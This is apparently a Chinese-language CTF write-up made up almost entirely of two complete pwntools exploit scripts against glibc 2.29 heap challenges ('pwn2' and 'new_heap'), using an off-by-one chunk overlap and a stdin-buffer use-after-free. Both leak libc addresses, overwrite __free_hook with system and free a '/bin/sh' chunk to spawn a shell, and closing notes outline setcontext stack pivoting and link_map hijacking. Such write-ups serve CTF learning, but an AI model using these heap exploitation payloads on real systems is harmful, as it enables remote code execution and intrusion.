off-by-one，可以修改 size，形成 chunk overlap。（好像没用到新保护机制）
#-*- coding:utf-8 -*-
from PwnContext import *
try:
from IPython import embed as ipy
except ImportError:
print ('IPython not installed.')
#context.terminal = ['tmux', 'splitw', '-h'] # uncomment this if you use tmux
# functions for quick script
# Short aliases over the PwnContext `ctx` tube (presumably the pwntools tube
# API -- only the method names are visible in this file). Every delimiter and
# payload is passed through str() before it reaches the tube, exactly as the
# original one-line lambdas did.
def s(data):
    """Forward str(data) to ctx.send()."""
    return ctx.send(str(data))


def sa(delim, data):
    """Forward str(delim), str(data) to ctx.sendafter()."""
    return ctx.sendafter(str(delim), str(data))


def sl(data):
    """Forward str(data) to ctx.sendline()."""
    return ctx.sendline(str(data))


def sla(delim, data):
    """Forward str(delim), str(data) to ctx.sendlineafter()."""
    return ctx.sendlineafter(str(delim), str(data))


def r(numb=4096):
    """Forward to ctx.recv(numb); default request size is 4096."""
    return ctx.recv(numb)


def ru(delims, drop=True):
    """Forward to ctx.recvuntil(delims, drop); *drop* defaults to True."""
    return ctx.recvuntil(delims, drop)


def irt():
    """Forward to ctx.interactive()."""
    return ctx.interactive()


def rs(*args, **kwargs):
    """Forward every argument to ctx.start()."""
    return ctx.start(*args, **kwargs)


def dbg(gs='', **kwargs):
    """Forward to ctx.debug(); *gs* is passed as the gdbscript keyword."""
    return ctx.debug(gdbscript=gs, **kwargs)


def uu32(data):
    """Right-pad *data* with NUL bytes to 4 bytes and unpack it with u32()."""
    return u32(data.ljust(4, '\0'))


def uu64(data):
    """Right-pad *data* with NUL bytes to 8 bytes and unpack it with u64()."""
    return u64(data.ljust(8, '\0'))
# --- run configuration -------------------------------------------------------
debugg = 1   # non-zero: launch the target as soon as this block has run
logg = 0     # non-zero: set the (presumably pwntools) context log level to 'debug'

# Target binary and the exact glibc build the exploit's constants were taken
# from (2.29-0ubuntu2, amd64). The /home/leo/... paths are the author's local
# glibc-all-in-one checkout and will need adjusting on another machine.
ctx.binary = './pwn2'
ctx.symbols = {'lst': 0x4060}
libc = ELF('/home/leo/glibc-all-in-one/libs/2.29-0ubuntu2_amd64/libc-2.29.so')
ctx.custom_lib_dir = '/home/leo/glibc-all-in-one/libs/2.29-0ubuntu2_amd64/'  # libc used for the remote target
ctx.remote_libc = '/home/leo/glibc-all-in-one/libs/2.29-0ubuntu2_amd64/libc-2.29.so'
ctx.debug_remote_libc = True

# The process is started before the log level is raised, as in the original.
if debugg != 0:
    rs()
if logg != 0:
    context.log_level = 'debug'
def add(idx, sz, c):
    """Menu choice 1: allocate slot *idx* with size *sz* and send *c* as content.

    *c* goes out through sa() (no newline appended), so the caller decides
    whether a trailing newline is part of the payload.
    """
    for prompt, value in (('> ', 1), ('idx:', idx), ('size:', sz)):
        sla(prompt, value)
    sa('cnt:', c)
def free(idx):
    """Menu choice 2: release slot *idx*."""
    for prompt, value in (('> ', 2), ('idx:', idx)):
        sla(prompt, value)
def edit(idx, c):
    """Menu choice 3: send *c* as the new content of slot *idx*.

    *c* is sent raw via sa(), so its length and any trailing newline are
    entirely up to the caller.
    """
    for prompt, value in (('> ', 3), ('idx:', idx)):
        sla(prompt, value)
    sa('cnt:', c)
def show(idx):
    """Menu choice 4: ask the target to print slot *idx*.

    Nothing is read back here; whatever the target replies stays in the tube
    for the caller to consume.
    """
    for prompt, value in (('> ', 4), ('idx:', idx)):
        sla(prompt, value)
def backdoor(c):
    """Menu choice 5: wait for the challenge's fixed prompt, then send *c* raw via sa()."""
    prompt = 'Because I know you are 666!'
    sla('> ', 5)
    sa(prompt, c)
# --- exploit body (pwn2, glibc 2.29) -----------------------------------------
# The only description of the bug is the author's opening line: an off-by-one
# that reaches a neighbouring size field and yields overlapping chunks. The
# comments below record what is sent; the constants are tied to the libc-2.29
# build configured above and are not derived anywhere in this file.

# Initial allocations, in the original order. Slot 5 is the only one whose
# content is not filler: it holds the '/bin/sh' string that is freed last.
for idx, size in ((1, 0x88), (2, 0x428), (0, 0x80), (3, 0x233), (4, 0x428)):
    add(idx, size, 'a' * size)
add(5, 0x88, '/bin/sh\x00' + '\n')

# Fill slot 1 completely and append the two bytes 0xb31 -- this is the write
# the off-by-one note at the top of the page refers to.
edit(1, 'a' * 0x88 + p16(0xb31))
free(3)
free(2)
add(6, 0x428, 'c' * 16 + '\n')

# Print slot 0 and take everything up to and including the first 0x7f byte as
# a libc pointer. NOTE(review): uu64() pads but never truncates, so this only
# works if at most 8 bytes precede that 0x7f -- nothing here checks it.
show(0)
lb = uu64(ru('\x7f', drop=False)) - 0x1e4ca0
fh = libc.sym['__free_hook'] + lb
sys = libc.sym['system'] + lb   # NOTE(review): shadows the `sys` module name if one is in scope
success(hex(lb))

# Slot 7 content: 0x88 bytes of padding, the qword 0x241, the low seven bytes
# of fh, then '\n' (the eighth byte is left to the newline; presumably the
# target's read stops there -- not visible here).
add(7, 0x100, 'a' * 0x88 + p64(0x241) + p64(fh)[:7] + '\n')
backdoor('b' * 8)
backdoor(p64(sys))
free(5)   # slot 5 holds '/bin/sh'
irt()
没有设置setbuf(stdin,0)缓冲区,利用getchar()申请malloc(0x1000)构成UAF的巧用。
#-*- coding:utf-8 -*-
from PwnContext import *
try:
from IPython import embed as ipy
except ImportError:
print ('IPython not installed.')
#context.terminal = ['tmux', 'splitw', '-h'] # uncomment this if you use tmux
# functions for quick script
# Short aliases over the PwnContext `ctx` tube (presumably the pwntools tube
# API -- only the method names are visible in this file). Every delimiter and
# payload is passed through str() before it reaches the tube, exactly as the
# original one-line lambdas did.
def s(data):
    """Forward str(data) to ctx.send()."""
    return ctx.send(str(data))


def sa(delim, data):
    """Forward str(delim), str(data) to ctx.sendafter()."""
    return ctx.sendafter(str(delim), str(data))


def sl(data):
    """Forward str(data) to ctx.sendline()."""
    return ctx.sendline(str(data))


def sla(delim, data):
    """Forward str(delim), str(data) to ctx.sendlineafter()."""
    return ctx.sendlineafter(str(delim), str(data))


def r(numb=4096):
    """Forward to ctx.recv(numb); default request size is 4096."""
    return ctx.recv(numb)


def ru(delims, drop=True):
    """Forward to ctx.recvuntil(delims, drop); *drop* defaults to True."""
    return ctx.recvuntil(delims, drop)


def irt():
    """Forward to ctx.interactive()."""
    return ctx.interactive()


def rs(*args, **kwargs):
    """Forward every argument to ctx.start()."""
    return ctx.start(*args, **kwargs)


def dbg(gs='', **kwargs):
    """Forward to ctx.debug(); *gs* is passed as the gdbscript keyword."""
    return ctx.debug(gdbscript=gs, **kwargs)


def uu32(data):
    """Right-pad *data* with NUL bytes to 4 bytes and unpack it with u32()."""
    return u32(data.ljust(4, '\0'))


def uu64(data):
    """Right-pad *data* with NUL bytes to 8 bytes and unpack it with u64()."""
    return u64(data.ljust(8, '\0'))
# --- run configuration -------------------------------------------------------
debugg = 1   # non-zero: launch the target as soon as this block has run
logg = 0     # non-zero: set the (presumably pwntools) context log level to 'debug'

# Target binary and the exact glibc build the exploit's constants were taken
# from (2.29-0ubuntu2, amd64). The /home/leo/... paths are the author's local
# glibc-all-in-one checkout and will need adjusting on another machine.
ctx.binary = './new_heap'
ctx.symbols = {'lst': 0x202060}
libc = ELF('/home/leo/glibc-all-in-one/libs/2.29-0ubuntu2_amd64/libc-2.29.so')
ctx.custom_lib_dir = '/home/leo/glibc-all-in-one/libs/2.29-0ubuntu2_amd64/'  # libc used for the remote target
ctx.remote_libc = '/home/leo/glibc-all-in-one/libs/2.29-0ubuntu2_amd64/libc-2.29.so'
ctx.debug_remote_libc = True

# The process is started before the log level is raised, as in the original.
if debugg != 0:
    rs()
if logg != 0:
    context.log_level = 'debug'
def add(sz, c):
    """Menu choice 1: allocate *sz* bytes and send *c* as the content.

    *c* goes out through sa() (no newline appended), so the caller decides
    whether a trailing newline is part of the payload.
    """
    for prompt, value in (('3.exit', 1), ('size:', sz)):
        sla(prompt, value)
    sa('content:', c)
def free(idx):
    """Menu choice 2: release the chunk at *idx*."""
    for prompt, value in (('3.exit', 2), ('index:', idx)):
        sla(prompt, value)
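# --- exploit body (new_heap, glibc 2.29) --------------------------------------
# Context from the author's note above: the target never calls
# setbuf(stdin, 0), so the first getchar() makes libc allocate a 0x1000-byte
# stdin buffer, which the script turns into a use-after-free. The comments
# below record what is sent; the constants are tied to the libc-2.29 build
# configured above and are not derived anywhere in this file.

# The target prints a heap value in hex right after this banner.
ru('good present for African friends:')
low_heap = int(ru('\n', drop=True), 16)
success(hex(low_heap))

# Eight 0x78-byte chunks whose content is simply their index as text ('0'..'7').
for i in range(8):
    add(0x78, str(i))
for i in range(7):
    free(i)
free(7)

# Menu choice 3 without waiting for its 'sure?' prompt; per the author's tag,
# the 'a' line is the input whose buffering triggers the malloc(0x1000).
sla('3.exit', 3)   # author's tag: #7
sl('a')
add(0x10, '8')     # author's tag: top chunk
free(7)
add(0x68, '9')
add(0x68, '10')
add(0x68, '11')
free(11)
free(10)
free(7)            # author's note: free(7) or free(9)

sla('3.exit', 3)
sla('sure?', 'a' * 0x30)
# Two bytes derived from the heap leak; the author tagged this line '#libc'.
# NOTE(review): p16() only holds 16 bits, so low_heap must already be a small
# partial value for this to fit -- the variable name suggests so, not verified.
fd = ((low_heap >> 4) << 12) | 0x730
sla('3.exit', 3)
sa('sure?', p16(fd))
stdout = 0x1760

# Debug pause left in by the author: attach gdb, then drop into IPython.
# The IPython import at the top of the file is guarded by except ImportError,
# but ipy() used to be called unconditionally and raised NameError whenever
# IPython was absent; only call it when the import actually succeeded.
dbg()
if 'ipy' in globals():
    ipy()

add(0x20, p16(stdout))
add(0x68, '13')   # author's tag: #13
add(0x68, '14')   # author's tag: #14
add(0x68, p64(0xfbad1800) + p64(0) * 3 + '\xc8')
# Six raw bytes come back and are treated as a libc pointer.
lb = uu64(r(6)) - 0x1e4a00
success(hex(lb))
free(7)
fh = libc.sym['__free_hook'] + lb
sys = libc.sym['system'] + lb   # NOTE(review): shadows the `sys` module name if one is in scope
success(hex(fh))

# p64(fh) is sent through menu choice 3 twice, exactly as in the original.
for _ in range(2):
    sla('3.exit', 3)
    sa('sure?', p64(fh))
add(0x68, '/bin/sh\x00')   # author's tag: #16
add(0x68, p64(sys))
free(16)
irt()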
然而在我们控了 free_hook 以后，我们发现 libc-2.29 中没有可以利用 rdi 控制 rsp 进行迁栈的 gadget，所以使用了其它方法。IO_wfile_sync 函数可以利用 rdi 控制 rdx，函数 setcontext+0x35 处可以用 rdx 控 rsp，两个搭配使用就可以进行迁栈。在 IO_wfile_sync+0x6d 处有 call [r12+0x20]，这里的 r12 也是可以用 rdi 控制的，所以可以利用这条指令调用 setcontext+0x35，实现 free_hook -> IO_wfile_sync -> setcontext+0x35。https://www.anquanke.com/post/id/210160
劫持link_map
1、smallbin attack 攻击global_max_fast
2、fastbin attack 劫持topchunk
3、伪造link_map结构,调用setcontext+0x3d
4、ROP
https://www.anquanke.com/post/id/211331